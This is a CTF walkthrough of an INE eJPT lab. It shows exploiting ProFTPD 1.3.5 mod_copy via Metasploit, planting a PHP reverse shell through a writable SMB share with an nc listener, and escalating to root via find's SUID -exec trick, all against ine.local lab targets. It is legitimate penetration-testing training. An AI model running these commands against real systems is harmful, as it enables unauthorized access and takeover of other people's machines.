Host & Network Penetration Testing: Exploitation CTF 3 (EJPT INE)
Hi all,
Welcome to our third exploitation lab!
Let’s dive in and get started.
The first two questions are based on target1.ine.local, and the next two questions are based on target2.ine.local.
Q.1 A vulnerable service maybe running on target1.ine.local. If exploitable, retrieve the flag from the root directory.
As usual, we start with an Nmap scan: nmap -sC -sV target1.ine.local.
Only two services are running, and our task is to identify which one is vulnerable. Let’s begin by analyzing the FTP service, which is running version 1.3.5.
To search for any known exploits for this version, we can query the searchsploit database using the command: searchsploit ProFTPD 1.3.5
We have identified this service as vulnerable, and an exploit is available in the Metasploit module which is unix/ftp/proftpd_modcopy_exec.
Type options to list the parameters needed for the module.
We need to set SITEPATH to /var/www/html because after navigating to the website, we found that the web root is located at /var/www/html.
Set the variables in msfconsole for RHOSTS, LHOST, and SITEPATH as follows:
Type run to execute the exploit.
As you can see, we have successfully created our session; type sessions to view it, and use sessions -u 1 to upgrade it to Meterpreter.
To interact with the Meterpreter session, type sessions -i 2.
As mentioned in the question, our flag is stored in the root directory. To retrieve it, type cat /flag1.txt. This gives us our first flag:
Q.2 Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.
As mentioned in the question, we need to enumerate local services on the target; use netstat -tuln 127.0.0.1 to view them.
Let’s interact with the service on port 8888 using nc 127.0.0.1 8888; to use the nc command, enter a shell by typing shell in the Meterpreter session, and to make it interactive, type /bin/bash -i.
Now, after running the command, it prompts for a passphrase. From the hint in flag1.txt, remember the three magical words "letmein" and use them to retrieve our second flag:
Now these two question based on target2.ine.local .
Q.3 A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?
As usual, we’ll start with nmap to see what services are running on target2.ine.local using the command: nmap -sC -sV target2.ine.local.
Since HTTP and SMB services are running, we can use enum4linux to enumerate the SMB service with the command: enum4linux -a target2.ine.local.
As you can see, there is one share with mapping and listing enabled; let’s connect to it using: smbclient //target2.ine.local/site-uploads and enter a blank password when prompted.
Now that we have access to site-uploads, meaning anything we upload here reflects on the website, let's upload our malicious file to the SMB server by copying the PHP shell with the command: cp /usr/share/webshells/php/php-reverse-shell.php .
We can modify the IP and port by editing the file with the nano command: nano php-reverse-shell.php.
Upload the file to SMB using the put command.
Start a Netcat listener to receive the connection: nc -lvnp 1234.
Open the browser and navigate to the location: http://target2.ine.local/site-uploads/php-reverse-shell.php.
And here we successfully got our connection in Netcat.
As mentioned, the flag is located in the root directory; let’s navigate to it using the command: cat /flag3.txt.
Q.4 Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?
We will start by checking the shells available on the system using the command: cat /etc/shells.
To check the permissions each shell has, use the command: cat /etc/shells | while read shell; do ls -l $shell 2>/dev/null; done.
Note: The command cat /etc/shells | while read shell; do ls -l $shell 2>/dev/null; done reads each shell listed in /etc/shells, checks its permissions using ls -l, and suppresses any errors (e.g., inaccessible files) with 2>/dev/null.
It means we can use any shell with the permission lrwxrwxrwx for escalation.
Now, to check for executables with the SetUID bit set that can run with root privileges, use the command: find / -perm -4000 2>/dev/null.
Note: The command find / -perm -4000 2>/dev/null does the following:
find /: Starts searching from the root directory/.-perm -4000: Looks for files with the SetUID permission bit set. This allows users to execute the file with the permissions of the file's owner.2>/dev/null: Suppresses error messages (e.g., permission denied messages) by redirecting them to/dev/null, effectively ignoring them.
When conducting privilege escalation, identifying SetUID (Set User ID) binaries is critical, as they allow executables to run with the permissions of their owner — often root. By searching for these binaries using the find command with the -perm -4000 flag, we can identify files that may be exploited.
By combining the find command with an executable like /bin/shor /bin/rbash, we can spawn a new shell with root privileges: find / -exec /bin/rbash -p \; -quit.
After successfully elevating our privileges to root, we can run the whoami command to confirm. Since the last flag is located in the root directory, we can obtain it by using the command: cat /root/flag4.txt.
Thank you, everyone, for reading! I hope this article has been helpful in guiding you through the steps.
Happy Hacking!
